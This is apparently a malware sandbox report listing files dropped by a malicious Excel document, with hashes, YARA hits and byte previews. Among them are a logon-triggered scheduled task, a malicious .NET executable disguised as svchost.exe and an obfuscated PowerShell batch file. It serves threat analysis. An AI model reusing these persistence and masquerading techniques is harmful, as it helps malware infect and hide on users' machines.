                                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp
                                                                Process:C:\Users\user\AppData\Local\Temp\ps.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1624
                                                                Entropy (8bit):5.155516511399198
                                                                Encrypted:false
                                                                SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBIOtn:cbhZ7ClNQi/rydbz9I3YODOLNdq36o
                                                                MD5:92780A1AFFA6988AB747662D1E2293D4
                                                                SHA1:4BD18D97C0088C7EEB8471758D2C6E7A7349D912
                                                                SHA-256:1571C2750BB9783C95048926B6256F599C9317551617D0871924D956D4A0A0CB
                                                                SHA-512:F878338A856F4DF7350C7E28F6373651B845C1915BF67C4785C344FC907820F25A4B6B8E37A0E92DD5D9C34CD9399AB553FB36714ABED7278B1584AD264D2020
                                                                Malicious:true
                                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe
                                                                Process:C:\Users\user\AppData\Local\Temp\ps.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1163264
                                                                Entropy (8bit):7.915040849931152
                                                                Encrypted:false
                                                                SSDEEP:24576:8mPsVSYhARcvhjuhGThHjY5hl70pJNw77YqXKM345BcyIc:64Yhv8h6dYFwpJ6XJC5H
                                                                MD5:128409D5CB9701CD12600BAF7A623794
                                                                SHA1:5E1F8E2C9421B3F7CABA07AE6BE503D272EBB8EB
                                                                SHA-256:80104E0AD490B44A632A15E5875E7626DB7F35FA94D7AADF19C45A621D75C7E0
                                                                SHA-512:267BBE58582CC95E9C45C05F19DEF1DABC491C1C55F6FD16A82256430AD805CE90B6472D934F42E539A40B99D98509E3E3B5E2A21600EFEAF26BC10E6F698681
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2._..............P..v...H......6.... ........@.. ....................... ............@....................................O.......PE........................................................................... ............... ..H............text...<t... ...v.................. ..`.rsrc...PE.......F...x..............@..@.reloc..............................@..B........................H.......................j..()...........................................0............(....(..........(.....o.....*.....................(.......( ......(!......("......(#....*N..(....o....($....*&..(%....*.s&........s'........s(........s)........s*........*....0...........~....o+....+..*.0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*&..(0....*...0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....
                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.LNK
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Tue Jan 5 02:14:47 2021, atime=Tue Jan 5 02:14:47 2021, length=169984, window=hide
                                                                Category:dropped
                                                                Size (bytes):2568
                                                                Entropy (8bit):4.476952625849961
                                                                Encrypted:false
                                                                SSDEEP:48:8X/XTFGqURC78uH+Qh2X/XTFGqURC78uH+Q/:8X/XJGqHj+Qh2X/XJGqHj+Q/
                                                                MD5:FA2A6E2DA6EFD084F9AF9B6BCD547C6E
                                                                SHA1:E4E41F6DA48DD2D2827A74BB0EA6E82F87571F5A
                                                                SHA-256:261D5190D504802F31F824620CCA8D29F2B8677F6895E21B1755A14061F8F41B
                                                                SHA-512:B8A3BF1BF5D3E86C58A9B5AFDF897D1BFD623E9B40F5743AD23009D69E61B0C62757E42DB72FBEECD29C26022DCECFB009CFDB8452C08E3CB608772194EACBD3
                                                                Malicious:false
                                                                Preview: L..................F.... ....@V..{..d.l......)s.............................;....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..z..%R.. .1E9B44~1.XLS..........Q.y.Q.y*...8.....................1.e.9.b.4.4.5.c.b.9.8.7.e.5.a.1.c.b.3.d.1.5.e.6.f.d.6.9.3.3.0.9.a.4.5.1.2.e.5.3.e.0.6.e.c.f.b.1.a.3.e.7.0.7.d.e.b.d.e.f.7.3.5.5...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls.[.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.e.9.b.4.4.5.c.b.9.8.7.e.5.a.1.c.b.3.d.1.5.e.6.f.d.6.9.3.3.0.9.a.4.5.1.2.e.5.3.e.0.6.e.c.f.b.1.a.3.e.7.0.7.d.e.b.d.e.f.7.3.5.5..
                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 5 02:14:47 2021, atime=Tue Jan 5 02:14:47 2021, length=8192, window=hide
                                                                Category:dropped
                                                                Size (bytes):867
                                                                Entropy (8bit):4.483977382940036
                                                                Encrypted:false
                                                                SSDEEP:12:85QdqVCLgXg/XAlCPCHaX2B8GB/oTxX+Wnicvb7jLbDtZ3YilMMEpxRljK8CTdJU:85nU/XTm6G2xYefbDv3q+rNru/
                                                                MD5:9361E5A65C51A7C5C90F42A03D65733F
                                                                SHA1:AC2C57F74A6D0FED78EB8A94F1C42D326C23469C
                                                                SHA-256:ACDCB45365D2A555051BB311BFB8DF401C753C9712C2F06EEEE5A81054D0382F
                                                                SHA-512:4D2171B9019B69B9E4DE00437A2F68282DC7FF683E63FC6CE98E66FB2F8FF5FB65F1257C0B5C19F35575FAA4C817F67B4F365C5B65EAECE06013F4BA58C3879D
                                                                Malicious:false
                                                                Preview: L..................F...........7G..d.l.....d.l...... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....%R....Desktop.d......QK.X%R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):245
                                                                Entropy (8bit):4.539882120504497
                                                                Encrypted:false
                                                                SSDEEP:3:oyBVomMM5XQJQAyXXbBX1HVML/IgMpSqXQJQAyXXbBX1HVML/IgMpSmMM5XQJQAn:dj6q7tF+jIgmtF+jIgFq7tF+jIgR
                                                                MD5:B069F1433E95E0835A5F47849C80D569
                                                                SHA1:8B9AD65811CDC72E61AD5EAA96D3DCBD1DCC7ED1
                                                                SHA-256:FEB8EF8DE63A557979BF3DDABA8A6060BADAF7D1AB1143A6AA1F47DF70876858
                                                                SHA-512:28E07E413EFAE8E97558AB8A5311BB2D89CB6B6F72DFFFD63C14FB33EC899DF7D5DE4B2058615DE1C4EC32E1AB2E68EB480D3EEFE0022CFC6EA2FBD8E82A8985
                                                                Malicious:false
                                                                Preview: Desktop.LNK=0..[xls]..1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.LNK=0..1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.LNK=0..[xls]..1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.LNK=0..
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0GIXF82C.txt
                                                                Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                File Type:ASCII text
                                                                Category:downloaded
                                                                Size (bytes):116
                                                                Entropy (8bit):4.395352109058765
                                                                Encrypted:false
                                                                SSDEEP:3:GmM/l1zH+xYZjTUFCRKESNItQBVVfR/ReX:XM/nzvHW5Er6R5EX
                                                                MD5:25DF76F2320E2DC6D352763F9ABC0581
                                                                SHA1:13E2D554264F509E1DE6CB00A369460CC9954728
                                                                SHA-256:C3C8CCD630DD46300F6746D2E57DEC07ACB09670F204E8862FA47FE9517F2FA2
                                                                SHA-512:7814671CA7FFB50504273251D22D5F7A09EB151BFEF79CF22940535E40FF45BF0101393FD4BE0A6852E8E034777C3B4D775EB79A2F192B32BCC392D0B3FCF5B0
                                                                Malicious:false
                                                                IE Cache URL:cryptodual.net/
                                                                Preview: __cfduid.d06f53df8ac0389b20d19542af55205061609784161.cryptodual.net/.9728.2691925632.30866008.3035335597.30860049.*.
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G7VTE4BUJJVJ02GNE19I.temp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8016
                                                                Entropy (8bit):3.592064761270266
                                                                Encrypted:false
                                                                SSDEEP:96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
                                                                MD5:6B364979C8767D2424D3C91EBDD89DCD
                                                                SHA1:86CAAFAD50B9238F8458D82DE0730886D50B337F
                                                                SHA-256:DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
                                                                SHA-512:396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
                                                                Malicious:false
                                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NZDSA84RF84J59JBFTNC.temp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8016
                                                                Entropy (8bit):3.592064761270266
                                                                Encrypted:false
                                                                SSDEEP:96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
                                                                MD5:6B364979C8767D2424D3C91EBDD89DCD
                                                                SHA1:86CAAFAD50B9238F8458D82DE0730886D50B337F
                                                                SHA-256:DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
                                                                SHA-512:396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
                                                                Malicious:false
                                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PB6OHLZ29ZGVS9S1BE0R.temp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8016
                                                                Entropy (8bit):3.592064761270266
                                                                Encrypted:false
                                                                SSDEEP:96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
                                                                MD5:6B364979C8767D2424D3C91EBDD89DCD
                                                                SHA1:86CAAFAD50B9238F8458D82DE0730886D50B337F
                                                                SHA-256:DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
                                                                SHA-512:396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
                                                                Malicious:false
                                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PFQODHVM4U1PD38F6YPM.temp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8016
                                                                Entropy (8bit):3.592064761270266
                                                                Encrypted:false
                                                                SSDEEP:96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
                                                                MD5:6B364979C8767D2424D3C91EBDD89DCD
                                                                SHA1:86CAAFAD50B9238F8458D82DE0730886D50B337F
                                                                SHA-256:DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
                                                                SHA-512:396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
                                                                Malicious:false
                                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TWOJT3O669AH3AZCWTO6.temp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8016
                                                                Entropy (8bit):3.592064761270266
                                                                Encrypted:false
                                                                SSDEEP:96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
                                                                MD5:6B364979C8767D2424D3C91EBDD89DCD
                                                                SHA1:86CAAFAD50B9238F8458D82DE0730886D50B337F
                                                                SHA-256:DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
                                                                SHA-512:396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
                                                                Malicious:false
                                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z32BQNYTSAI4D5J8YUSI.temp
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8016
                                                                Entropy (8bit):3.592064761270266
                                                                Encrypted:false
                                                                SSDEEP:96:chQCsMqaqvsqvJCwo0z8hQCsMqaqvsEHyqvJCworez2YYXHXf8H7lUVCIu:cyzo0z8ynHnorez2Lf8H1Iu
                                                                MD5:6B364979C8767D2424D3C91EBDD89DCD
                                                                SHA1:86CAAFAD50B9238F8458D82DE0730886D50B337F
                                                                SHA-256:DCDA2C328C39B01FD373FEF9F670075B94CB1E40D06774C3FC2654272F6B183D
                                                                SHA-512:396AAF0D2D9B215BF17D15D8D5F001CC4B51A08D778AF70A95D37D9FDB591BA4DA10CBFBF4DEAD1E425A66B68BA2F129AE89010F2B39A08B36486CB847AB258A
                                                                Malicious:false
                                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                C:\Users\user\AppData\Roaming\svchost.exe
                                                                Process:C:\Users\user\AppData\Local\Temp\ps.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1163264
                                                                Entropy (8bit):7.915040849931152
                                                                Encrypted:false
                                                                SSDEEP:24576:8mPsVSYhARcvhjuhGThHjY5hl70pJNw77YqXKM345BcyIc:64Yhv8h6dYFwpJ6XJC5H
                                                                MD5:128409D5CB9701CD12600BAF7A623794
                                                                SHA1:5E1F8E2C9421B3F7CABA07AE6BE503D272EBB8EB
                                                                SHA-256:80104E0AD490B44A632A15E5875E7626DB7F35FA94D7AADF19C45A621D75C7E0
                                                                SHA-512:267BBE58582CC95E9C45C05F19DEF1DABC491C1C55F6FD16A82256430AD805CE90B6472D934F42E539A40B99D98509E3E3B5E2A21600EFEAF26BC10E6F698681
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2._..............P..v...H......6.... ........@.. ....................... ............@....................................O.......PE........................................................................... ............... ..H............text...<t... ...v.................. ..`.rsrc...PE.......F...x..............@..@.reloc..............................@..B........................H.......................j..()...........................................0............(....(..........(.....o.....*.....................(.......( ......(!......("......(#....*N..(....o....($....*&..(%....*.s&........s'........s(........s)........s*........*....0...........~....o+....+..*.0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*&..(0....*...0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....
                                                                C:\Users\user\Desktop\D4FE0000
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                Category:dropped
                                                                Size (bytes):178421
                                                                Entropy (8bit):7.50264756586487
                                                                Encrypted:false
                                                                SSDEEP:3072:jLk3hbdlylKsgqopeJBWhZFGkE+cL2NdlbtEW1euanw2a3phbbJsrloqTknlAH9a:nk3hbdlylKsgqopeJBWhZFVE+W2Ndlbh
                                                                MD5:C9EFF753C7AD61E408A9718A39AC6610
                                                                SHA1:07886DA6E870BEA6D4DF13604118738425C2BF96
                                                                SHA-256:B63C6383D9DEEA0537ACE46015AE1708A96815435D480BCB225D00BE272AD9D3
                                                                SHA-512:EAC9E17AB079298285E7C392300027C0B51CECDDEC67B39B4B44283DDFDA34FC55DF91F8AF4A25C451D9E5CC0A09E414752FE0D6111B4B58448EB6891ACFE244
                                                                Malicious:false
                                                                Preview: ........g2..........................\.p....user B.....a.........=..............ThisWorkbook....................................=........K^)8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1. .................C.o.n.s.o.l.a.s.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6..
                                                                C:\Users\user\Documents\pd.bat
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):2020
                                                                Entropy (8bit):5.312948573774158
                                                                Encrypted:false
                                                                SSDEEP:48:dnjA3VfSB//7vUVfSB//7vQVfSB//7vEsAQ:dnM30F/Q0F/k0F/dAQ
                                                                MD5:384D01463EABC7A8F4D815862000360D
                                                                SHA1:2876CE40F37588B4AF437DDFC9A62FC46F4B4296
                                                                SHA-256:F74736334D05832FD555A83F49C920A36580FD328792973B76EBAC6FC1A1A76C
                                                                SHA-512:4CE8140330E9DF68F16580BD778D037A787EC6FB0175A7D406869878E0733D85A9A7B3B7D73A728ECF609C6A710BC684900D7A78B1F577292A1BFBEEDABB031B
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: C:\Users\user\Documents\pd.bat, Author: Florian Roth
                                                                • Rule: JoeSecurity_ObfuscatedPowershell, Description: Yara detected Obfuscated Powershell, Source: C:\Users\user\Documents\pd.bat, Author: Joe Security
